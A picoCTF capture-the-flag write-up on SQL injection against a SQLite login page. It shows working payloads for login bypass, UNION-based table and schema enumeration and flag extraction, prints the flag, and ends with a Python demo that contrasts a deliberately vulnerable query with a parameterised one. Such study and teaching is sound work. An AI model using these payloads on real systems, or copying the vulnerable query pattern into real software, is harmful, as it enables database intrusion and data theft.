
picoCTF More SQLi Challenge (Medium) (Web)

Hey there!

Today I will be solving the More SQLi (Medium) challenge.

Initial Reconnaissance

When I put random characters in the username and password fields, the application echoed back the following SQL query, which served as a hint:

SELECT id FROM users WHERE password = 'd' AND username = 'ADMIN'

Basic SQLi Exploit

Based on the revealed info, I made a simple SQL injection exploit for the password field:

' OR 1=1 --


This led me to the following page:


Figure 1: Screenshot of the page accessed after successful SQL injection

UNION-based Injection

Judging that the underlying query involved 3 columns, I ran a UNION SELECT like so:

'UNION SELECT 1,2,3 --

This approach worked: the three injected values were reflected on the page.

Database Identification

At first I couldn't figure out which database the challenge was using, so I checked the challenge hint, which said "SQLiLite" and pointed to an SQLite backend.

SQLite Exploitation

With this information, I consulted the SQLite injection cheatsheet: SQLite Injection Cheatsheet

I then executed this command to retrieve the SQLite version:

'UNION SELECT 1,sqlite_version(),3 --

This query returned the SQLite version as shown here:


Figure 2: Screenshot showing the SQLite version

Table Enumeration

To enumerate the database tables, I used:

'UNION SELECT 1,(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),3 --

This revealed a table named more_table, matching what the text at the top of the welcome page had said.


Figure 3: Screenshot showing the result of table enumeration

Table Structure

To examine the structure of more_table, I executed:

'UNION SELECT 1,(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='more_table'),3 --

This query returned the table's schema.


Figure 4: Screenshot showing the structure of ‘more_table’

Flag Extraction

Finally, to extract the flag, I ran:

'UNION SELECT 1,(SELECT flag FROM more_table),3 --

This query successfully retrieved the flag:

picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_98236ce6}


Figure 5: Screenshot showing the extracted flag
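As an added example (not part of the original writeup or the challenge's own code), the following constructed SQLite stand-in shows why the echoed query is injectable and how a parameterised query neutralises the same payloads. The table contents, the password and the flag value are placeholders, not the challenge's real data.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database (placeholder data).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE more_table (id INTEGER PRIMARY KEY, flag TEXT);
INSERT INTO users VALUES (1, 'ADMIN', 'placeholder-password');
INSERT INTO more_table VALUES (1, 'picoCTF{placeholder_flag}');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    # Mirrors the query the challenge echoed back: user input is spliced into
    # the SQL text, so a quote in the password field changes the query structure.
    query = (f"SELECT id FROM users WHERE password = '{password}' "
             f"AND username = '{username}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    # Parameterised form: the driver binds the values, so quotes, OR 1=1,
    # UNION and '--' all stay inside the string literal and never reach the parser.
    query = "SELECT id FROM users WHERE password = ? AND username = ?"
    return conn.execute(query, (password, username)).fetchall()


def demo():
    conn = open_db()
    bypass = "' OR 1=1 --"                       # the login-bypass payload from the writeup
    union = "' UNION SELECT flag FROM more_table --"  # the flag-extraction idea, one column
    return {
        "bypass_vulnerable": login_vulnerable(conn, "ADMIN", bypass),
        "bypass_safe": login_safe(conn, "ADMIN", bypass),
        "union_vulnerable": login_vulnerable(conn, "ADMIN", union),
        "union_safe": login_safe(conn, "ADMIN", union),
        "legit_safe": login_safe(conn, "ADMIN", "placeholder-password"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

In the vulnerable function both payloads return rows (a user id, then the placeholder flag); in the parameterised function they return nothing, while the genuine credentials still log in.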

Thanks for reading this writeup, see you later!